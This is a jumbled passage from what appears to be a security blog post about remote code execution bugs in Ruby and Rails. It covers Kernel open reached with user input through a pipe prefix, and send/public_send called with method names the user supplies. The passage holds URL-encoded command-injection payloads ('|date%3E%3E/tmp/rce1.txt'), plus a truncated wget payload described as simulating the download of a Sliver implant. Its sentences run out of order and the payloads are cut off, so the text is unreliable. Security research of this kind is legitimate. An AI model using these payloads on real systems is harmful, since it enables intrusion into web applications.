nd(mn, "a", "b", "c", "A", "B", "C")īecause the functions are identified by strings, not symbols, the method(s) to call can even be specified in user-supplied input. Puts "Arguments: " + args.join(', ').downcase For example, the following code can be used to pass the same input to three different functions within a custom class: Ruby developers can use them to make certain parts of their code more flexible. Ruby objects have a pair of interesting shorthand functions named send and public_send that accept a method name as a string, and then a variable number of arguments that should be passed to the method identified by the first argument. This is one of my go-tos for exploit development because it's harmless and gives me a log of every time the exploit was successful, not just the most recent (like touch /tmp/rce1.txt would). In the remainder of this post, the example shell commands are variations on date > /tmp/rce1.txt. …which simulates downloading and executing a Sliver implant. …which will execute the proof-of-concept shell command date > /tmp/rce1.txt, or: |wget%20 In the example, it can be exploited by accessing a URL such as: |date%3E%3E/tmp/rce1.txt then that request handler is vulnerable to arbitrary OS command execution, simply by the attacker setting the first character of the input to a pipe character (|). If the built-in Ruby open function is called with user-supplied input in a Rails request handler, like this: open(params) This is the most straightforward Ruby-specific RCE vulnerability this blog post will discuss.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |